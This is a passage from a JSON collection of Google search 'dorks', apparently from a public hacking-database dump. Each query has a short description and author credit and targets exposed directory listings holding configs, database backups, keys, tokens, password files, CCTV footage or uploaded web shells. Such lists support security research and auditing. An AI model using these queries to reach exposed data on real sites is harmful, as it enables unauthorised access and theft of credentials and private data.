*\r\n\r\n*Discovers Scada juicy information.*\r\n\r\n*SCADA Sensitive Directories Expose on Site**.*\r\n\r\n*Date :- 20th April, 2019*\r\n\r\n*Exploit Author :- Aman Bhardwaj *"}, {"dork": "inurl:bc.googleusercontent.com intitle:index of", "description": "dork that enumerates GCP for sensitive directories\r\n\r\n*Google Dork*\r\n\r\ninurl:bc.googleusercontent.com intitle:index of\r\n\r\n*Dates: *21-05-2019\r\n\r\n*Dork Author:* acc3ssp0int"}, {"dork": "filetype:git -github.com inurl:\"/.git\"", "description": "Google dork description: web servers serving the git repository. This\r\npotential flaw can be used to download content from the Web server that\r\nmight otherwise be private.\r\n\r\nGoogle Search: filetype:git -github.com inurl:\"/.git\"\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "filetype:svn -gitlab -github inurl:\"/.svn\"", "description": "Google dork description: web servers serving the svn repository. This\r\npotential flaw can be used to download content from the Web server that\r\nmight otherwise be private.\r\n\r\nGoogle Search: filetype:svn -gitlab -github inurl:\"/.svn\"\r\n\r\nSubmitted by: Alfie\r\n\r\nTwitter: https://twitter.com/emenalf"}, {"dork": "intitle:\"index of\" intext:\"Includes", "description": "*Exploit *: This Dorks allow you to access the sensitive directories\r\nusing includes file.\r\n\r\n*Google Dork* : intitle:\"index of\" intext:\"Includes\"\r\n\r\n*Exploit Author*:- Deepak Joshi"}, {"dork": "intitle:\"index of\" intext:\"Includes wordpress\"", "description": "Wordpress based website having sensitive directories.\r\n\r\nGoogle Dork: *intitle:\"index of\" intext:\"Includes wordpress\"*\r\n\r\nAuthor: Needa Petkar."}, {"dork": "\"To Parent Directory\" AND \"dir>\" AND \"web.config\"", "description": "Dork:\r\n\"To Parent Directory\" AND \"dir>\" AND \"web.config\"\r\n\r\nDescription:\r\nWeb Servers with Open Directory Listing containing web.config file"}, {"dork": "Inurl : /list/hdd1", "description": "# Google Dork: Inurl: /list/hdd1\r\n# Date: 2019-06-19\r\n# Author: l0n1s"}, {"dork": "Index of / *.ovpn", "description": "Files configuration openvpn, some certs, keys.\r\n\r\nIndex of / *.ovpn\r\n\r\nAuthor: nuria_pp"}, {"dork": "\"Index of\" inurl:config inurl:production", "description": "Dork: \"Index of\" inurl:config inurl:production\r\n\r\nDescription:\r\nOpen Directory listing with words \"config\" and \"production\" in the URL"}, {"dork": "intitle:\"Index of\" phpinfo.php", "description": "# Google Dork : intitle:\"Index of\" phpinfo.php\r\n# Author: Ayan Saha\r\n# Date: 23.07.2019\r\n# Tested on : Chrome,firefox."}, {"dork": "intitle:\"Index of\" public", "description": "# Exploit Title: Public Folder Directories\r\n\r\n# Google Dork: intitle:\"Index of\" public\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "intitle:\"Index of\" portal", "description": "Author = Scott FCS\r\n\r\nExploit Title = Public Portal Directory's"}, {"dork": "intitle:\"Index of\" wp-config", "description": "Dork:\r\nintitle:\"Index of\" wp-config\r\n\r\ninfo:contains wordpress senstive files\r\n\r\nAuthor:Mayur Parmar"}, {"dork": "intitle:\"Index of\" wp-content", "description": "Dork:\r\nintitle:\"Index of\" wp-content\r\n\r\nAuthor:Mayur Parmar\r\n\r\ninfo:\r\nit contains wordpress sensitive information."}, {"dork": "intitle:index.of.?.sql", "description": "I found a dork which lead to download .sql files from website. The dork is\r\n\r\n*DORK :\" ** intitle:index.of.?.sql **\" *"}, {"dork": "inurl: /filemanager/dialog.php", "description": "Dork : inurl: /filemanager/dialog.php\r\n\r\nImpact :Sensitive directories\r\n\r\nAuthor: Aditya shende\r\n\r\nDate : 1 august 2019"}, {"dork": "\"Index of\" inurl:webalizer", "description": "Google Dork: \"Index of\" inurl:webalizer\r\nDate: 08/02/2019\r\nAuthor: Adrian Roy Lorica"}, {"dork": "\"Index of\" inurl:phpmyadmin", "description": "Google Dork: inurl: \"Index of\" inurl:phpmyadmin\r\nDate: 08/02/2019\r\nAuthor: Adrian Roy Lorica"}, {"dork": "\"Index of\" inurl:htdocs inurl:xampp", "description": "Google Dork: \"Index of\" inurl:htdocs inurl:xampp\r\nDate: 08/02/2019\r\nAuthor: Adrian Roy Lorica"}, {"dork": "intitle:\"Index of\" inurl:wp-json/oembed", "description": "#Google Dork:\r\nintitle:\"Index of\" inurl:wp-json\r\nintitle:\"Index of\" inurl:wp-json/oembed\r\n\r\n#Description: contains sensitive files, links embedded with wordpress & can\r\nbe used to find CORS\r\n\r\n# Author: Tejas Jain ( https://www.linkedin.com/in/tejasjain52 )"}, {"dork": "intitle:\"Index of\" phpmyadmin", "description": "Dork:\r\nintitle:\"Index of\" phpmyadmin\r\n\r\nAuthor:mayur parmar(th3cyb3rc0p)\r\n\r\nInfo:\r\nContains sensitive information"}, {"dork": "intitle:\"Index of\" wp-admin", "description": "Dork: intitle:\"Index of\" wp-admin\r\nAuthor: Sathishshan\r\nInfo: Contains wordpress sensitive information & sensitive files"}, {"dork": "intitle:\"index of\" drupal", "description": "Dork: intitle:\"index of \" Drupal\r\nAuthor: Coudry hugo\r\nInfo : contains Drupal Sensitive files and information"}, {"dork": "intitle:\"index of\" admin", "description": "Dork: intitle\"index of\" admin\r\nAuthor : Coudry Hugo\r\nSensitive Directories"}, {"dork": "inurl:/sites/default/private", "description": "# Google Dork: inurl: inurl:/sites/default/private\r\n\r\n# Description: contains sensitive files & directories\r\n\r\n# Date: 07-08-2019\r\n\r\n# Author: Fr\u00e9d\u00e9ric Meunier"}, {"dork": "intitle:\"index of\" sql inurl:./db/", "description": "# Google Dork: intitle:\"index of\" sql inurl:./db/\r\n# Date: 09th AUGUST 2019\r\n# Author: BLAY ABU SAFIAN\r\n\r\nSENSITIVE DATABASE CREDENTIALS"}, {"dork": "intitle:index.of./.sql", "description": "I found a dork using which .SQL files can be downloaded from websites.\r\n\r\nHere is the dork :\r\nintitle:index.of./.sql\r\n\r\nSourajeet Majumder"}, {"dork": "intitle:\"Index of\" login.php", "description": "Dork: intitle:\"Index of\" login.php\r\nAuthor: Sathishshan\r\nInfo: Contains sensitive information & sensitive files"}, {"dork": "intitle:\"Index of\" wp-config.php", "description": "Dork: intitle:\"Index of\" wp-config.php\r\nAuthor: Sathishshan\r\nInfo: Contains sensitive information & sensitive files"}, {"dork": "intitle:index.of.?.bak", "description": "Google Dork: intitle:index.of.?.bak\r\n\r\nCategory: Sensitive Directories\r\n\r\nDescription:\r\nUsed to find sensitive .bak files which are backup files, in\r\nwebapplications.\r\n\r\nAuthor Name: Abhishek Sidharth"}, {"dork": "intitle:index.of./.db", "description": "dork to find the database information.\r\n\r\nDork : intitle:index.of./.db"}, {"dork": "intitle:\"index of\" /php4/", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" /php4/\r\nintitle:\"index of\" /php/ inurl:/php/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" mysqli.ini", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" mysqli.ini\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" ssh2.ini", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" ssh2.ini\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:index.of.?.mysql", "description": "Google Dork: intitle:index.of.?.mysql\r\n\r\nCategory: Sensitive Directories\r\n\r\nDescription:\r\nUsed to find sensitive .mysql files"}, {"dork": "site:*/wp-includes/ inurl:/wp-includes/", "description": "Sensitive Directory:\r\n\r\nsite:*/wp-includes/ inurl:/wp-includes/\r\n\r\nReza Abasi"}, {"dork": "site:*/wp-contents/ inurl:/wp-contents/", "description": "Sensitive Directory:\r\n\r\nsite:*/wp-contents/ inurl:/wp-contents/\r\nsite:*/wp-contents/uploads/ inurl:/wp-contents/uploads/\r\n\r\nReza Abasi"}, {"dork": "intitle:\"index of\" /content/admin/", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" /content/admin/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" /content/uploads/ -inurl:/wp-content/uploads/", "description": "Sensitive Directory:\r\n\r\nintitle:\"index of\" /content/uploads/ -inurl:/wp-content/uploads/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:index.of.?.database", "description": "Google Dork: intitle:index.of.?.database\r\n\r\nCategory: Sensitive Directories\r\n\r\nDescription:\r\nUsed to find sensitive database files (*.sql) from the website directory\r\n\r\nAuthor: Midhun Biju"}, {"dork": "index of /cache", "description": "Google Dork : index of /cache\r\n\r\nNisankh Acharjya"}, {"dork": "intitle:index.of.?.login", "description": "Descriptiton:\r\nUsed to find user authentication files from the website directory"}, {"dork": "site:*/wordpress/wordpress.bak/", "description": "sensitive directory:\r\n\r\nsite:*/wordpress/wordpress.bak/\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" /config.ini", "description": "files containing password,sensitive info:\r\n\r\nintitle:\"index of\" /config.ini\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/wp/wp-admin/", "description": "sensitive directories:\r\n\r\ninurl:/wp/wp-admin/\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/admin/ intitle:index.of", "description": "Google Dork: inurl:/admin/ intitle:index.of\r\n\r\nCategory: Sensitive Directories\r\nDescription: Index.of/ Sensitive Directories (i.e */admin/ )\r\nAuthor:Abhishek Samaddar"}, {"dork": "inurl:admin/data* intext:index of", "description": "Google Dork: inurl:admin/data* intext:index of\r\n\r\nCategory: Files Containing Juicy Info.\r\nAuthor:Abhishek Samaddar"}, {"dork": "inurl:/database* ext:sql intext:index of -site:github.com", "description": "Google Dork: inurl:/database* ext:sql intext:index of -site:github.com\r\n\r\nCategory: Files Containing Juicy Info.\r\nAuthor:Abhishek Samaddar"}, {"dork": "inurl: /upload.php intitle:index of", "description": "Google Dork: inurl: /upload.php intitle:index of\r\n\r\nCategory: Vulnerable Files.\r\nAuthor:Abhishek Samaddar"}, {"dork": "inurl:/scgi-bin*", "description": "Google Dork Submission for Apache servers, usually publicly facing directories, you might get lucky and find an outdated Cisco Router.\r\n\r\nAuthor: MiningOmerta"}, {"dork": "inurl:/wp-admin/includes/plugin-install.php", "description": "dork:\r\ninurl:/wp-admin/includes/plugin-install.php\r\n\r\nAuthor: Mayur Parmar(th3cyb3rc0p)"}, {"dork": "site:ftp.* index of /ftp/backup", "description": "To View *Backup* files on *FTP* server of various websites\r\n\r\n*Dork: site:ftp.* index of /ftp/backup*\r\n*Author: Paras Arora(PAC Security)*\r\n*Date: 9th September 2019*\r\n*Category: Backup files on FTP Server*"}, {"dork": "inurl:wp-content intext:backup-db", "description": "I have tested a dork in the Google Search and have found interesting\r\nresults.\r\n\r\nDork : *inurl:wp-content intext:backup-db*\r\n\r\n\r\n - This gives us the result of Various backup files/Folders stored in\r\n wp-content/uploads directories of various websites.\r\n - It also gives database backups consisting of SQL backup files of\r\n various websites who have not secured their sensitive directories.\r\n\r\nKaustubh Kale"}, {"dork": "inurl:/_vti_txt*", "description": "Google Dorks for Sensitive Directories"}, {"dork": "intitle:index.of./.htaccess", "description": "Dork Description : intitle:index.of./.htaccess\r\nCategory : Sensitive Directories."}, {"dork": "indexof:.htaccess", "description": "dork:\r\nindexof:.htaccess\r\n\r\nAuthor: Mayur parmar(th3cyb3rc0p)"}, {"dork": "indexof:backup/mysql", "description": "Dork:\r\nindexof:backup/mysql\r\nAuthor:\r\nSanyam Chawla"}, {"dork": "intitle:index.of \"admin.db\"", "description": "Google Dork: intitle:index.of \"admin.db\"\r\nDate: 09/17/2019\r\nExploit Author: th3d3xt3r"}, {"dork": "intitle:index.of \"admin\" filetype:sql", "description": "Google Dork: intitle:index.of \"admin\" filetype:sql\r\nDate: 09/17/2019\r\nExploit Author: th3d3xt3r"}, {"dork": "indexof:backup/web.config", "description": "Google Dork Description: indexof:backup/web.config\r\nAuthor Name: Vyshnav nk"}, {"dork": "site:* index of: *.exe", "description": "*DORK: *site:* index of: *.exe\r\n*AUTHOR*: Paras Arora(PAC Security)\r\n*DATE*: 12 October 2019\r\n*Category*: Juicy Files"}, {"dork": "intitle:\"Index of\" secret", "description": "# Exploit Title: Secret Folder\r\n\r\n# Google Dork: intitle:\"Index of\" secret\r\n\r\n# Author: Francis Al Victoriano"}, {"dork": "intitle:\"index of\" \"/etc/mysql/\"", "description": "Sensitive directories and files:\r\n\r\nintitle:\"index of\" \"/etc/mysql/\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:/wp-content/uploads/ninja-forms/ intitle:\"index of\"", "description": "Google Dork Description: WordPress Ninja Forms Plugin, Sensitive file\r\nuploads.\r\n\r\nGoogle Search: inurl:/wp-content/uploads/ninja-forms/\r\n\r\nAuthor: derezzed"}, {"dork": "site:* index of: /config", "description": "*DORK: *site:* index of: /config\r\nAUTHOR: Paras Arora(PAC Security)\r\nDATE: 22nd October 2019\r\nCATEGORY: Juicy Files"}, {"dork": "site:*/logs/default.htm", "description": "Sensitive directories:\r\n\r\nsite:*/logs/default.htm\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Index of\" wp-upload", "description": "Dork:\r\nintitle:\"Index of\" wp-upload\r\nintitle:\"Index of\" wp-uploads\r\n\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nit contains wordpress sensitive information."}, {"dork": "intitle:index.of \"database.db\"", "description": "Sensitive Directories:\r\n\r\nintitle:index.of \"database.db\"\r\n\r\nAuthor: Ismail Tasdelen"}, {"dork": "intitle:index.of \"system.db\"", "description": "Sensitive Directories:\r\n\r\nintitle:index.of \"system.db\"\r\nintitle:index.of \"hash.db\"\r\nintitle:index.of \"sql.db\"\r\n\r\nAuthor: Ismail Tasdelen"}, {"dork": "site:* index.of: /android/manifest.xml", "description": "Dork: site:* index.of: /android/manifest.xml\r\nAuthor: Paras Arora(PAC Security)\r\nDate: 5th Nov 2019\r\nCategory: Android Files"}, {"dork": "intext:\"index of\" intext:..bak intext:config", "description": "Div backup files\r\n\r\nAuthor: Mattias Borg\r\n@mattiasborg82"}, {"dork": "intitle:index.of \"htaccess.txt\"", "description": "Dork:\r\nintitle:index.of \"htaccess.txt\"\r\nAuthor:Ismail Tasdelen\r\n\r\nInfo:\r\nIt contains htaccess.txt clear text sensitive information."}, {"dork": "intitle:\"index of\" \"ws_ftp.log\"", "description": "Sensitive directories:\r\n\r\nintitle:\"index of\" \"ws_ftp.log\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:index.of \"chroot.conf\"", "description": "Dork:\r\nintitle:index.of \"chroot.conf\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\n\r\nInfo:\r\nIt contains sensitive information"}, {"dork": "intitle:index of \"uploads\"", "description": "# Google Dork : intitle:index of \"uploads\"\r\n\r\n# Category : File contains Juicy items\r\n\r\n# Date : 14-11-2019\r\n\r\n# Author : Rohitreddy"}, {"dork": "index of /storage/logs/", "description": "[*] Description: This dork will give you informational Logs of Laravel framework.\r\n\r\n[*] Google Dork: index of /storage/logs/\r\n\r\n[*] Author: Osman Arif"}, {"dork": "\"key\" OR key.jar intitle:\"index of\" webstart", "description": "*Java Web Start* (also known as *JavaWS*, *javaws* or *JAWS*) allows users\r\nto start application software for the Java Platform directly from the\r\nInternet using a web browser.\r\n\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" .zshrc~ OR .zshrc OR .zshenv OR .zshenv~ -pool -public", "description": "Z shell (Zsh) juicy info\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" .oracle_jre_usage/", "description": "This dork gives you the version of Java used by the target\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "-pub -pool intitle:\"index of\" squirrelmail/", "description": "Squirrel mail configuration files and sometimes credentials.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "-pub -pool intitle:\"index of\" vagrantfile -\"How to\"", "description": "The primary function of the Vagrantfile is to describe the type of machine\r\nrequired for a project, and how to configure and provision these machines.\r\nIt can contain DB passwords, private keys, usernames etc...\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool", "description": "API keys\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" domain.key -public", "description": "Domains private Keys\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"ftp.log\"", "description": "Dork: intitle:\"index of\" \"ftp.log\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\nLinkedin: https://www.linkedin.com/in/pankaj1261/\r\nTwitter: @Nep_1337_1998\r\n\r\nInfo:\r\nIt contains FTP LOGS"}, {"dork": "intitle:\"index of\" \"sms.log\"", "description": "Dork: intitle:\"index of\" \"sms.log\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\nLinkedin: https://www.linkedin.com/in/pankaj1261/\r\nTwitter: @Nep_1337_1998\r\n\r\nInfo:\r\nIt contains SMS LOGS"}, {"dork": "-pool intitle:\"index of\" wget-log -pub", "description": "This dork will give you a good insight of what was downloaded in a system.\r\nGreat for enumeration.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"/Cloudflare-CPanel-7.0.1\"", "description": "Dork: intitle:\"index of\" \"/Cloudflare-CPanel-7.0.1\"\r\n\r\nAuthor: Pankaj Kumar Thakur (Nepal)\r\nLinkedin: https://www.linkedin.com/in/pankaj1261/\r\nTwitter: @Nep_1337_1998\r\n\r\nInfo:\r\nIt expose Cloudflare-Cpanel sensitive files"}, {"dork": "intitle:index.of \"backwpup\"", "description": "Dork : intitle:index.of \"backwpup\"\r\n\r\nAuthor Gaurav Solanki (@heydarklord)"}, {"dork": "intitle:index.of \"db.zip\"", "description": "Find database backup files.\r\n\r\n-- \r\n*Hilary Soita.*"}, {"dork": "intitle:\"index of\" \"*php.swp\"", "description": "Find swp files left over by vim and other text editors, to allow for php\r\nsource code disclosure."}, {"dork": "intitle:\"index of\" \"htdocs.zip\"", "description": "Find htdocs/website compressed backup.\r\n\r\n-- \r\n*Hilary Soita.*"}, {"dork": "inurl:concrete/config/", "description": "Interesting directories from concrete5 cms exploiting directory listing.\r\n\r\ninurl:concrete/config/\r\n\r\nInteresting directories from concrete5 cms exploiting directory listing\r\nshoing config dir.\r\n\r\nBy\r\nSagar Banwa"}, {"dork": "inurl:\"/includes/api/\" intext:\"index of /\"", "description": "Dork to Find interesting folder related to API\r\n\r\ninurl:\"/includes/api/\" intext:\"index of /\"\r\n\r\nSagar Banwa"}, {"dork": "inurl:\"/includes/OAuth2\" intext:\"index of /\"", "description": "inurl:\"/includes/OAuth2\" intext:\"index of /\"\r\n\r\nSagar Banwa"}, {"dork": "intext:\"index of /\" \".composer-auth.json\"", "description": "intext:\"index of /\" \".composer-auth.json\"\r\n\r\nby\r\nPranshu Tiwari"}, {"dork": "intitle:\"index of\" \"config.py\"", "description": "The python configuration files can be found using the dork:\r\nintitle:\"index of\" \"config.py\"\r\n\r\n-Juveria Banu"}, {"dork": "intitle:\"index of\" \"metadata\"", "description": "# Google Dork: intitle:\"index of\" \"metadata\"\r\n\r\n# By using this dork, sensitive directories with juicy information can be\r\nfound.\r\n\r\n# Date: 14/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" inurl:wp-json embedurl?", "description": "Google Dork Query to find out sensitive information for misconfigured\r\nwordpress base servers.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" inurl:wp-json embedurl?*"}, {"dork": "intitle:\"index of\" \"apache-log-parser\" \"Port 80\"", "description": "Google Dork Query to find out insecure Apache Log Parsers giving access to\r\nServers Logs running on Port 80.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"apache-log-parser\" \"Port 80\"*"}, {"dork": "intitle:\"index of\" \"maven-metadata.xml\" \"Port 80\"", "description": "Google Dork Query to find out insecure maven meta data stored in XML format\r\nto identify the older versions which are also running on Port 80.\r\n\r\nGoogle Dork Query: i*ntitle:\"index of\" \"maven-metadata.xml\" \"Port 80\"*"}, {"dork": "intitle:\"index of\" \"jwt-auth\"", "description": "Google Dork Query to find out insecure and sensitve settings.yml metadata\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"jwt-auth\"*"}, {"dork": "intitle:\"index of\" \"/concrete/Authentication\"", "description": "Google Dork Query to find out insecure and sensitve concrete Authentication\r\nstored in YML format.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"/concrete/Authentication\"*"}, {"dork": "intitle:\"index of\" cvsroot", "description": "# Google Dork: intitle:\"index of\" cvsroot\r\n\r\n# By using this dork, cvsroot directories with juicy information and\r\nsometimes with exposed passwords can be found.\r\n\r\n# Date: 31/03/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"cctv\"", "description": "#Description: intitle:\"index of\" \"cctv\"\r\nThis Google dork shows CCTV video footages of other which are saved\r\ninsecurely on websites.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Ketan Amrute\r\n#Date: 4 April 2020"}, {"dork": "intitle:\"index of\" \"owncloud/config/*\"", "description": "This dork found owncloud config file. You can specify the search under the\r\n\"owncloud\" path.\r\n\r\nGoogle Dork : intitle:\"index of\" \"owncloud/config/*\"\r\n\r\nAuthor : Berat ISLER(root1x)"}, {"dork": "intitle:\"index of\" \"iredadmin/*\"", "description": "This dork found some useful information about the iredadmin mail\r\napplication.\r\n\r\nGoogle Dork : intitle:\"index of\" \"iredadmin/*\"\r\n\r\nAuthor : Berat ISLER (root1x)"}, {"dork": "intitle: \"index of\" \"MySQL-Router\"", "description": "#Description : intitle: \"index of\" \"MySQL-Router\"\r\nMySQL-Router is a middleware that routes database traffic to back end\r\ndatabase. This Google dork gives us sensitive information such as\r\ninformation of the users - location, username, ID etc.\r\n\r\n#Author: Kartik Adak\r\n#Date: 11 April 2020"}, {"dork": "intitle:\"index of\" \"common.crt\" OR \"ca.crt\"", "description": "# Google Dork: intitle:\"index of\" \"common.crt\" OR \"ca.crt\"\r\n\r\n# Configuration vpn files, certs, some keys, containing useful and juicy\r\ninformation.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"proxy.pac\" OR \"proxy.pac.bak\"", "description": "# Google Dork: intitle:\"index of\" \"proxy.pac\" OR \"proxy.pac.bak\"\r\n\r\n# Various proxy pac files containing juicy and sensitive information.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"global.asa\"", "description": "# Google Dork: intitle:\"index of\" \"global.asa\"\r\n\r\n# The global.asa configuration file is used by ASP.net applications to\r\nstore information and objects used by the application. Sometimes usernames,\r\npasswords, and database credentials can be revealed.\r\n\r\n# Date: 20/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/db_backups/\"", "description": "#Description: intitle:\"index of\" \"/db_backups/\"\r\nThis Google dork shows juicy information about the website and finds out\r\ndatabase backup files with publicly available database directories.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 28 April 2020"}, {"dork": "intitle:\"index of\" db.frm", "description": "Dork: intitle:\"index of\" db.sql\r\nDescription: This Google dork shows juicy information about the website and\r\nfinds out publicly available *MariaDB databases* that contain sensitive\r\ninformation & can be exploited by the hacker.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"git-jira-log\"", "description": "Dork: intitle:\"index of\" \"git-jira-log\"\r\nDescription: This Google dork lists out sensitive git jira log files which\r\ncontain jira commits made via git for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"/admin_backup\"", "description": "#Description: intitle:\"index of\" \"/admin_backup\"\r\nThis Google dork shows juicy information about the website and some\r\nsensitive directories.\r\nAn attacker can further misuse this to conduct attacks.\r\n\r\n#Author : Tushar Kurunkar\r\n#Date : 30 April 2020"}, {"dork": "intitle:\"index of\" \"admin/json\"", "description": "Dork: intitle:\"index of\" \"admin/json\"\r\nDescription: This Google dork lists out sensitive json file stored in the\r\nadmin folder for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"/admin/backup\"", "description": "Path to admin backup file using\r\n\r\nintitle:\"index of\" \"/admin/backup\"\r\n\r\n-Juveria Banu"}, {"dork": "intitle:\"index of\" \"graphql/subscription\"", "description": "Dork: intitle:\"index of\" \"graphql/subscription\"\r\nDescription: This Google dork lists out sensitive graphQL subscription\r\nflows for a website.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"symfony/config\"", "description": "Dork: intitle:\"index of\" \"symfony/config\"\r\nDescription: This google dork lists out symfony configuration details for a\r\nwebserver.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"test/storage/framework/sessions/\"", "description": "# Google Dork: intitle:\"index of\" \"test/storage/framework/sessions/\"\r\n\r\n# Juicy information and sensitive directories, including tokens and more.\r\n\r\n# Date: 6/05/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"tinyfilemanager.php\"", "description": "Dork: intitle:\"index of\" \"tinyfilemanager.php\"\r\nDescription: This google dork lists out websites with the\r\n\"tinyfilemanager.php\" shell uploaded on them and informs the attacker that\r\na remote shell upload is possible.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"api/admin\"", "description": "Dork: intitle:\"index of\" \"api/admin\"\r\nDescription: This google dork lists out admin files for apis used on web\r\nservers.\r\nAuthor: Abhi Chitkara"}, {"dork": "\"index of\" \"/config/sql\"", "description": "# Title: Find sensitive SQL config files.\r\n# Google Dork: \"index of\" \"/config/sql\"\r\n# Date: 27/05/2020\r\n# Author: Ritik Sahni"}, {"dork": "intitle:\"index of\" \"admin/config\"", "description": "Dork:- intitle:\"index of\" \"admin/config\"\r\n\r\nDescription:-\r\nThis google dorks will find some Juicy Information about the admin-config\r\nfile.\r\n\r\nAuthor:- Manish Kumar"}, {"dork": "intitle:\"index of\" \"system/config\"", "description": "Dork:- intitle:\"index of\" \"system/config\"\r\n\r\nDescription:-\r\nThis google dorks will find some Juicy Information about the system-config\r\nfile.\r\n\r\nAuthor:- Manish Kumar"}, {"dork": "intitle:\"index of\" inurl:ftp intext:admin", "description": "Dork: intitle:\"index of\" inurl:ftp intext:admin\r\nDescription: This google dorks lists out admin folders on ftp servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "allintitle: sensitive ext:doc OR ext:xls OR ext:xlsx", "description": "# Google Dork: allintitle: sensitive ext:doc OR ext:xls OR ext:xlsx\r\n# Sensitive stuff.\r\n# Date: 29/05/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"uploads.old\"", "description": "Dork: intitle:\"index of\" \"uploads.old\"\r\nDescription: This google dorks lists out sensitive files stored in old\r\nupload folders on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"Dashboard [Jenkins]\"", "description": "Google Dork: intitle:\"Dashboard [Jenkins]\"\r\n\r\nCategory: Sensitive Directories\r\n\r\nUsed to find Jenkins Dashboard\r\n\r\nAuthor Name: Vidhun k"}, {"dork": "\"index of\" \"fileadmin\"", "description": "Dork: \"index of\" \"fileadmin\"\r\nAuthor: Hemant Patidar (HemantSolo)\r\nLinkedin: https://www.linkedin.com/in/hemantsolo/\r\n\r\nHemant Patidar\r\n\r\nEthical Hacker | Founder and CEO at Solo Securities,\r\n\r\nCyber Security Analyst at Ismile Technologies\r\n\r\nPursuing B.Tech Civil Engineering from SRM University"}, {"dork": "\"index of\" \"svg\"", "description": "# Google Dork: \"index of\" \"svg\"\r\n# Title: Sensitive file disclosure\r\n# Date: 06/06/2020\r\n# Author: Mahesh Rai\r\n# LinkedIn: https://www.linkedin.com/in/mahesh-rai\r\n# Bugcrowd: https://bugcrowd.com/Mahesh_Rai"}, {"dork": "intitle:\"index of\" \"survey.cgi\"", "description": "Author: Mohammed Arif H\r\nDork: intitle:\"index of\" \"survey.cgi\""}, {"dork": "index of logs.tar", "description": "# Dork: index of logs.tar\r\n# Description: Juicy info"}, {"dork": "\"Index of\" \"sass-cache\"", "description": "Google Dork: \"Index of\" \"sass-cache\"\r\nCategory: Sensitive Directories\r\nAuthor: Prashant Sharma (@Prashantique)\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intitle:\"index of\" \"admin/sql/\"", "description": "Google Dork: intitle:\"index of\" \"admin/sql/\"\r\n\r\nImpact: Sensitive Directories\r\n\r\nAuthor: Rutwik Shah\r\nLinkedIn: https://www.linkedin.com/in/rutwikshah/"}, {"dork": "intext:\"INTERNAL USE ONLY\" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx", "description": "# Google Dork: intext:\"INTERNAL USE ONLY\" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx\r\n# Sensitive stuff.\r\n# Date: 2020-06-16\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:admin/data* intext:index of", "description": "*GOOGLE DORK : inurl:admin/data* intext:index of*\r\n\r\n*AUTHOR : ANJALI PRAKASH*"}, {"dork": "inurl:_vti_pvt/service.pwd", "description": "# Google Dork: inurl:_vti_pvt/service.pwd\r\n# Juicy information and sensitive directories including passwords.\r\n# Date: 17/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": 